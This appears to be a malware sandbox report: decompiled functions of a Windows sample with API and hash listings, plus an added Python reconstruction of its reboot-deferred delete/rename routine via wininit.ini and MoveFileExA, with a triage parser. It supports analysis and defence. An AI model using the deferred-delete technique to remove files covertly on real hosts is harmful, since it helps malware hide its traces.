                                        APIs
                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F7A
                                        • GetDlgItem.USER32 ref: 00403F8E
                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
                                        • GetSysColor.USER32(?), ref: 00403FBD
                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
                                        • lstrlenA.KERNEL32(?), ref: 00403FE5
                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
                                        • GetDlgItem.USER32 ref: 00404065
                                        • SendMessageA.USER32(00000000), ref: 00404068
                                        • GetDlgItem.USER32 ref: 00404093
                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
                                        • LoadCursorA.USER32 ref: 004040E2
                                        • SetCursor.USER32(00000000), ref: 004040EB
                                        • ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
                                        • LoadCursorA.USER32 ref: 0040410B
                                        • SetCursor.USER32(00000000), ref: 0040410E
                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                        • String ID: N$open
                                        • API String ID: 3615053054-904208323
                                        • Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                        • Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
                                        • Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                        • Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E00405707(long _a4, long _a16) {
                                        				CHAR* _v0;
                                        				intOrPtr* _t13;
                                        				long _t14;
                                        				int _t19;
                                        				void* _t27;
                                        				long _t28;
                                        				intOrPtr* _t36;
                                        				int _t42;
                                        				intOrPtr* _t43;
                                        				long _t48;
                                        				CHAR* _t50;
                                        				void* _t52;
                                        				void* _t54;
                                        
                                        				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA");
                                        				_t50 = _v0;
                                        				if(_t13 != 0) {
                                        					_t19 =  *_t13(_a4, _t50, 5);
                                        					if(_t19 != 0) {
                                        						L16:
                                        						 *0x7a3010 =  *0x7a3010 + 1;
                                        						return _t19;
                                        					}
                                        				}
                                        				 *0x7a1710 = 0x4c554e;
                                        				if(_t50 == 0) {
                                        					L5:
                                        					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400);
                                        					if(_t14 != 0 && _t14 <= 0x400) {
                                        						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188);
                                        						GetWindowsDirectoryA(0x7a1188, 0x3f0);
                                        						lstrcatA(0x7a1188, "\\wininit.ini");
                                        						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0);
                                        						_t54 = _t19;
                                        						if(_t54 == 0xffffffff) {
                                        							goto L16;
                                        						}
                                        						_t48 = GetFileSize(_t54, 0);
                                        						_t5 = _t42 + 0xa; // 0xa
                                        						_t52 = GlobalAlloc(0x40, _t48 + _t5);
                                        						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
                                        							L15:
                                        							_t19 = CloseHandle(_t54);
                                        							goto L16;
                                        						} else {
                                        							if(E00405624(_t52, "[Rename]\r\n") != 0) {
                                        								_t27 = E00405624(_t25 + 0xa, "\n[");
                                        								if(_t27 == 0) {
                                        									L13:
                                        									_t28 = _t48;
                                        									L14:
                                        									E00405670(_t52 + _t28, 0x7a0d88, _t42);
                                        									SetFilePointer(_t54, 0, 0, 0);
                                        									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
                                        									GlobalFree(_t52);
                                        									goto L15;
                                        								}
                                        								_t36 = _t27 + 1;
                                        								_t43 = _t36;
                                        								if(_t36 >= _t52 + _t48) {
                                        									L21:
                                        									_t28 = _t36 - _t52;
                                        									goto L14;
                                        								} else {
                                        									goto L20;
                                        								}
                                        								do {
                                        									L20:
                                        									 *((char*)(_t43 + _t42)) =  *_t43;
                                        									_t43 = _t43 + 1;
                                        								} while (_t43 < _t52 + _t48);
                                        								goto L21;
                                        							}
                                        							E004059BF(_t52 + _t48, "[Rename]\r\n");
                                        							_t48 = _t48 + 0xa;
                                        							goto L13;
                                        						}
                                        					}
                                        				} else {
                                        					CloseHandle(E00405690(_t50, 0, 1));
                                        					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);
                                        					if(_t14 != 0 && _t14 <= 0x400) {
                                        						goto L5;
                                        					}
                                        				}
                                        				return _t14;
                                        			}

                                        Addresses, one per line of the E00405707 body above in order (0x00000000 where the decompiler assigned none):
                                        0x00405715 0x0040571c 0x00405720 0x00405729 0x0040572d 0x00405879 0x00405879 0x00000000
                                        0x00405879 0x0040572d 0x00405739 0x0040574f 0x00405777 0x00405782 0x00405786 0x004057a9
                                        0x004057b1 0x004057bd 0x004057d4 0x004057da 0x004057df 0x00000000 0x00000000 0x004057ee
                                        0x004057f0 0x004057fd 0x00405801 0x00405872 0x00405873 0x00000000 0x0040581d 0x0040582a
                                        0x0040588f 0x00405896 0x0040583d 0x0040583d 0x0040583f 0x00405848 0x00405853 0x00405865
                                        0x0040586c 0x00000000 0x0040586c 0x00405898 0x0040589e 0x004058a0 0x004058af 0x004058af
                                        0x00000000 0x00000000 0x00000000 0x00000000 0x004058a2 0x004058a2 0x004058a4 0x004058a7
                                        0x004058ab 0x00000000 0x004058a2 0x00405835 0x0040583a 0x00000000 0x0040583a 0x00405801
                                        0x00405751 0x0040575c 0x00405765 0x00405769 0x00000000 0x00000000 0x00405769 0x00405883

                                        APIs
                                          • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                          • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                          • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                        • GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
                                        • GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
                                        • wsprintfA.USER32 ref: 004057A0
                                        • GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                        • lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                        • CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
                                        • GlobalFree.KERNEL32 ref: 0040586C
                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873
                                          • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                          • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
                                        • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
                                        • API String ID: 3633819597-1342836890
                                        • Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                        • Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
                                        • Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                        • Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD
                                        Uniqueness

                                        Uniqueness Score: -1.00%
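The routine E00405707 in this entry is the sample's reboot-deferred file delete/rename. It first tries MoveFileExA(src, dst, 5), where 5 is MOVEFILE_REPLACE_EXISTING | MOVEFILE_DELAY_UNTIL_REBOOT; a NULL destination means "delete at next boot", and on NT-family Windows that request is recorded in the PendingFileRenameOperations value under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager, which is the first place to check during triage of this sample. If the import cannot be resolved the routine falls back to the Windows 9x mechanism visible in the strings: it writes `DST=SRC\r\n` (or `NUL=SRC\r\n` for a delete; the literal 0x4c554e stored at 0x7a1710 is "NUL") with 8.3 short paths into the [Rename] section of %WINDIR%\wininit.ini, creating the section at end of file if absent, or, if present, inserting the line before the next `\n[` section header (or at end of file when there is none). The Python below is an added reconstruction of that merge logic together with a small parser for listing pending operations from a wininit.ini; it is not code from the sample or from the report, every function and constant name in it is mine, the sample wininit.ini contents are constructed, and the 8.3 conversion done by GetShortPathNameA is assumed to have happened already.

```python
# Added reconstruction of the reboot-deferred delete/rename fallback seen in
# E00405707 (wininit.ini "[Rename]" section).  Example code written for this
# page, not code from the sample or the analysis report.  Assumptions:
#   - input paths are already 8.3 short paths (the sample calls
#     GetShortPathNameA; that step is not reproduced here),
#   - line format "%s=%s\r\n" with the literal "NUL" (0x4c554e) as the
#     destination for a delete, as the decompiled strings show,
#   - all function and constant names below are mine.
from __future__ import annotations
from typing import Optional

RENAME_HDR = b"[Rename]\r\n"   # the sample searches for, and appends, exactly this
NEXT_SECTION = b"\n["          # what it searches for to locate the section end


def build_rename_line(src_short: bytes, dst_short: Optional[bytes]) -> bytes:
    r"""Format "%s=%s\r\n" with the destination first.  A None destination
    becomes "NUL", which the boot-time processor treats as "delete the source"."""
    dst = b"NUL" if dst_short is None else dst_short
    return dst + b"=" + src_short + b"\r\n"


def add_rename(ini: bytes, line: bytes) -> bytes:
    r"""Merge `line` into wininit.ini contents the way E00405707 does.

    No [Rename] section: append "[Rename]\r\n" + line at end of file.
    Section present:     find the next "\n[" after the header and insert the
                         line in front of that "["; with no further section,
                         append at end of file.
    The sample shifts the file tail with a byte loop; slicing does the same
    job here.  Like the sample, the search for the next header starts after
    the full "[Rename]\r\n", so an empty [Rename] section immediately followed
    by another section is not recognised as empty.
    """
    hdr = ini.find(RENAME_HDR)
    if hdr < 0:
        return ini + RENAME_HDR + line
    nxt = ini.find(NEXT_SECTION, hdr + len(RENAME_HDR))
    if nxt < 0:
        return ini + line
    cut = nxt + 1              # keep the "\n", insert before the "["
    return ini[:cut] + line + ini[cut:]


def pending_operations(ini: bytes) -> list:
    """Triage helper: (action, source, destination) tuples from the [Rename]
    section; action is "delete" for a NUL destination, otherwise "move"."""
    ops = []
    in_section = False
    for raw in ini.splitlines():
        s = raw.strip()
        if s.startswith(b"[") and s.endswith(b"]"):
            in_section = (s.lower() == b"[rename]")
            continue
        if not in_section or b"=" not in s:
            continue
        dst, src = s.split(b"=", 1)
        ops.append(("delete" if dst.upper() == b"NUL" else "move", src, dst))
    return ops


# Constructed sample wininit.ini (not taken from any analysed host) with an
# existing [Rename] section sandwiched between two other sections.
SAMPLE_INI = (b"[boot]\r\nshell=explorer.exe\r\n"
              b"[Rename]\r\nNUL=C:\\TEMP\\OLD~1.TMP\r\n"
              b"[fonts]\r\n")

if __name__ == "__main__":
    line = build_rename_line(b"C:\\USERS\\BOB\\APPDAT~1\\Y4U485~1.EXE", None)
    merged = add_rename(SAMPLE_INI, line)
    print(merged.decode())
    for action, src, dst in pending_operations(merged):
        print(f"{action:6} {src.decode()} -> {dst.decode()}")
```

Running the block prints the merged file with the new delete line placed inside [Rename] ahead of [fonts], followed by the two pending deletes as the parser sees them. On a live host the same parser can be pointed at %WINDIR%\wininit.ini; on NT-family systems also read PendingFileRenameOperations, since that is where the MoveFileExA path records the request.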

                                        C-Code - Quality: 90%
                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                        				struct tagLOGBRUSH _v16;
                                        				struct tagRECT _v32;
                                        				struct tagPAINTSTRUCT _v96;
                                        				struct HDC__* _t70;
                                        				struct HBRUSH__* _t87;
                                        				struct HFONT__* _t94;
                                        				long _t102;
                                        				signed int _t126;
                                        				struct HDC__* _t128;
                                        				intOrPtr _t130;
                                        
                                        				if(_a8 == 0xf) {
                                        					_t130 =  *0x7a2f88;
                                        					_t70 = BeginPaint(_a4,  &_v96);
                                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                        					_a8 = _t70;
                                        					GetClientRect(_a4,  &_v32);
                                        					_t126 = _v32.bottom;
                                        					_v32.bottom = _v32.bottom & 0x00000000;
                                        					while(_v32.top < _t126) {
                                        						_a12 = _t126 - _v32.top;
                                        						asm("cdq");
                                        						asm("cdq");
                                        						asm("cdq");
                                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                        						_t87 = CreateBrushIndirect( &_v16);
                                        						_v32.bottom = _v32.bottom + 4;
                                        						_a16 = _t87;
                                        						FillRect(_a8,  &_v32, _t87);
                                        						DeleteObject(_a16);
                                        						_v32.top = _v32.top + 4;
                                        					}
                                        					if( *(_t130 + 0x58) != 0xffffffff) {
                                        						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                        						_a16 = _t94;
                                        						if(_t94 != 0) {
                                        							_t128 = _a8;
                                        							_v32.left = 0x10;
                                        							_v32.top = 8;
                                        							SetBkMode(_t128, 1);
                                        							SetTextColor(_t128,  *(_t130 + 0x58));
                                        							_a8 = SelectObject(_t128, _a16);
                                        							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
                                        							SelectObject(_t128, _a8);
                                        							DeleteObject(_a16);
                                        						}
                                        					}
                                        					EndPaint(_a4,  &_v96);
                                        					return 0;
                                        				}
                                        				_t102 = _a16;
                                        				if(_a8 == 0x46) {
                                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                        					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
                                        				}
                                        				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                        			}

                                        Addresses, one per line of the E00401000 body above in order (0x00000000 where the decompiler assigned none):
                                        0x0040100a 0x00401039 0x00401047 0x0040104d 0x00401051 0x0040105b 0x00401061 0x00401064
                                        0x004010f3 0x00401089 0x0040108c 0x004010a6 0x004010bd 0x004010cc 0x004010cf 0x004010d5
                                        0x004010d9 0x004010e4 0x004010ed 0x004010ef 0x004010ef 0x00401100 0x00401105 0x0040110d
                                        0x00401110 0x00401112 0x00401118 0x0040111f 0x00401126 0x00401130 0x00401142 0x00401156
                                        0x00401160 0x00401165 0x00401165 0x00401110 0x0040116e 0x00000000 0x00401178 0x00401010
                                        0x00401013 0x00401015 0x0040101f 0x0040101f 0x00000000

                                        APIs
                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32 ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32 ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                        • Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
                                        • Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                        • Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 88%
                                        			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
                                        				struct _ITEMIDLIST* _v8;
                                        				char _v12;
                                        				signed int _v16;
                                        				signed int _v20;
                                        				signed int _v24;
                                        				signed int _v28;
                                        				CHAR* _t35;
                                        				signed int _t37;
                                        				signed int _t38;
                                        				signed int _t49;
                                        				char _t51;
                                        				signed int _t61;
                                        				char* _t62;
                                        				char _t67;
                                        				signed int _t69;
                                        				CHAR* _t79;
                                        				signed int _t86;
                                        				signed int _t88;
                                        				void* _t89;
                                        
                                        				_t61 = _a8;
                                        				if(_t61 < 0) {
                                        					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
                                        				}
                                        				_t62 = _t61 +  *0x7a2fb8;
                                        				_t35 = 0x7a1f20;
                                        				_t79 = 0x7a1f20;
                                        				if(_a4 - 0x7a1f20 < 0x800) {
                                        					_t79 = _a4;
                                        					_a4 = _a4 & 0x00000000;
                                        				}
                                        				while(1) {
                                        					_t67 =  *_t62;
                                        					_a11 = _t67;
                                        					if(_t67 == 0) {
                                        						break;
                                        					}
                                        					__eflags = _t79 - _t35 - 0x400;
                                        					if(_t79 - _t35 >= 0x400) {
                                        						break;
                                        					}
                                        					_t62 = _t62 + 1;
                                        					__eflags = _t67 - 0xfc;
                                        					if(__eflags <= 0) {
                                        						if(__eflags != 0) {
                                        							 *_t79 = _t67;
                                        							_t79 =  &(_t79[1]);
                                        							__eflags = _t79;
                                        						} else {
                                        							 *_t79 =  *_t62;
                                        							_t79 =  &(_t79[1]);
                                        							_t62 = _t62 + 1;
                                        						}
                                        						continue;
                                        					}
                                        					_t37 =  *((char*)(_t62 + 1));
                                        					_t69 =  *_t62;
                                        					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
                                        					_v28 = _t69;
                                        					_v20 = _t37;
                                        					_t70 = _t69 | 0x00008000;
                                        					_t38 = _t37 | 0x00008000;
                                        					_v24 = _t69 | 0x00008000;
                                        					_t62 = _t62 + 2;
                                        					__eflags = _a11 - 0xfe;
                                        					_v16 = _t38;
                                        					if(_a11 != 0xfe) {
                                        						__eflags = _a11 - 0xfd;
                                        						if(_a11 != 0xfd) {
                                        							__eflags = _a11 - 0xff;
                                        							if(_a11 == 0xff) {
                                        								__eflags = (_t38 | 0xffffffff) - _t86;
                                        								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
                                        							}
                                        							L38:
                                        							_t79 =  &(_t79[lstrlenA(_t79)]);
                                        							_t35 = 0x7a1f20;
                                        							continue;
                                        						}
                                        						__eflags = _t86 - 0x1b;
                                        						if(_t86 != 0x1b) {
                                        							__eflags = (_t86 << 0xa) + 0x7a4000;
                                        							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
                                        						} else {
                                        							E0040591D(_t79,  *0x7a2f84);
                                        						}
                                        						__eflags = _t86 + 0xffffffeb - 6;
                                        						if(_t86 + 0xffffffeb < 6) {
                                        							L29:
                                        							E00405BFB(_t79);
                                        						}
                                        						goto L38;
                                        					}
                                        					_a8 = _a8 & 0x00000000;
                                        					 *_t79 =  *_t79 & 0x00000000;
                                        					_t88 = 4;
                                        					__eflags = _v20 - _t88;
                                        					if(_v20 != _t88) {
                                        						_t49 = _v28;
                                        						__eflags = _t49 - 0x2b;
                                        						if(_t49 != 0x2b) {
                                        							__eflags = _t49 - 0x26;
                                        							if(_t49 != 0x26) {
                                        								__eflags = _t49 - 0x25;
                                        								if(_t49 != 0x25) {
                                        									__eflags = _t49 - 0x24;
                                        									if(_t49 != 0x24) {
                                        										goto L19;
                                        									}
                                        									GetWindowsDirectoryA(_t79, 0x400);
                                        									goto L18;
                                        								}
                                        								GetSystemDirectoryA(_t79, 0x400);
                                        								goto L18;
                                        							}
                                        							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
                                        							__eflags =  *_t79;
                                        							if( *_t79 != 0) {
                                        								goto L29;
                                        							}
                                        							E004059BF(_t79, "C:\\Program Files");
                                        							goto L18;
                                        						} else {
                                        							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
                                        							L18:
                                        							__eflags =  *_t79;
                                        							if( *_t79 != 0) {
                                        								goto L29;
                                        							}
                                        							goto L19;
                                        						}
                                        					} else {
                                        						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
                                        						L19:
                                        						__eflags =  *0x7a3004;
                                        						if( *0x7a3004 == 0) {
                                        							_t88 = 2;
                                        						}
                                        						do {
                                        							_t88 = _t88 - 1;
                                        							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
                                        							__eflags = _t51;
                                        							if(_t51 != 0) {
                                        								 *_t79 =  *_t79 & 0x00000000;
                                        								__eflags =  *_t79;
                                        								goto L25;
                                        							}
                                        							__imp__SHGetPathFromIDListA(_v8, _t79);
                                        							_v12 = _t51;
                                        							E0040521C(_t70, _v8);
                                        							__eflags = _v12;
                                        							if(_v12 != 0) {
                                        								break;
                                        							}
                                        							L25:
                                        							__eflags = _t88;
                                        						} while (_t88 != 0);
                                        						__eflags =  *_t79;
                                        						if( *_t79 != 0) {
                                        							__eflags = _a8;
                                        							if(_a8 != 0) {
                                        								lstrcatA(_t79, _a8);
                                        							}
                                        						}
                                        						goto L29;
                                        					}
                                        				}
                                        				 *_t79 =  *_t79 & 0x00000000;
                                        				if(_a4 == 0) {
                                        					return _t35;
                                        				}
                                        				return E004059BF(_a4, _t35);
                                        			}
                                        0x004059e8
                                        0x004059ef
                                        0x00405a00
                                        0x00405a00
                                        0x00405a0a
                                        0x00405a0c
                                        0x00405a13
                                        0x00405a1b
                                        0x00405a21
                                        0x00405a24
                                        0x00405a24
                                        0x00405bd5
                                        0x00405bd5
                                        0x00405bd9
                                        0x00405bdc
                                        0x00000000
                                        0x00000000
                                        0x00405a31
                                        0x00405a37
                                        0x00000000
                                        0x00000000
                                        0x00405a3d
                                        0x00405a3e
                                        0x00405a41
                                        0x00405bc8
                                        0x00405bd2
                                        0x00405bd4
                                        0x00405bd4
                                        0x00405bca
                                        0x00405bcc
                                        0x00405bce
                                        0x00405bcf
                                        0x00405bcf
                                        0x00000000
                                        0x00405bc8
                                        0x00405a47
                                        0x00405a4b
                                        0x00405a5b
                                        0x00405a62
                                        0x00405a65
                                        0x00405a68
                                        0x00405a6a
                                        0x00405a6d
                                        0x00405a70
                                        0x00405a71
                                        0x00405a75
                                        0x00405a78
                                        0x00405b73
                                        0x00405b77
                                        0x00405ba7
                                        0x00405bab
                                        0x00405bb0
                                        0x00405bb4
                                        0x00405bb4
                                        0x00405bb9
                                        0x00405bbf
                                        0x00405bc1
                                        0x00000000
                                        0x00405bc1
                                        0x00405b79
                                        0x00405b7c
                                        0x00405b91
                                        0x00405b98
                                        0x00405b7e
                                        0x00405b85
                                        0x00405b85
                                        0x00405ba0
                                        0x00405ba3
                                        0x00405b6b
                                        0x00405b6c
                                        0x00405b6c
                                        0x00000000
                                        0x00405ba3
                                        0x00405a7e
                                        0x00405a82
                                        0x00405a87
                                        0x00405a88
                                        0x00405a8b
                                        0x00405a96
                                        0x00405a99
                                        0x00405a9c
                                        0x00405ab5
                                        0x00405ab8
                                        0x00405ae5
                                        0x00405ae8
                                        0x00405af8
                                        0x00405afb
                                        0x00000000
                                        0x00000000
                                        0x00405b03
                                        0x00000000
                                        0x00405b03
                                        0x00405af0
                                        0x00000000
                                        0x00405af0
                                        0x00405aca
                                        0x00405acf
                                        0x00405ad2
                                        0x00000000
                                        0x00000000
                                        0x00405ade
                                        0x00000000
                                        0x00405a9e
                                        0x00405aae
                                        0x00405b09
                                        0x00405b09
                                        0x00405b0c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00405b0c
                                        0x00405a8d
                                        0x00405a8d
                                        0x00405b0e
                                        0x00405b0e
                                        0x00405b15
                                        0x00405b19
                                        0x00405b19
                                        0x00405b1a
                                        0x00405b1d
                                        0x00405b29
                                        0x00405b2f
                                        0x00405b31
                                        0x00405b50
                                        0x00405b50
                                        0x00000000
                                        0x00405b50
                                        0x00405b37
                                        0x00405b40
                                        0x00405b43
                                        0x00405b48
                                        0x00405b4c
                                        0x00000000
                                        0x00000000
                                        0x00405b53
                                        0x00405b53
                                        0x00405b53
                                        0x00405b57
                                        0x00405b5a
                                        0x00405b5c
                                        0x00405b60
                                        0x00405b66
                                        0x00405b66
                                        0x00405b60
                                        0x00000000
                                        0x00405b5a
                                        0x00405a8b
                                        0x00405be2
                                        0x00405bec
                                        0x00405bf8
                                        0x00405bf8
                                        0x00000000

                                        APIs
                                        • SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
                                        • SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
                                        • lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
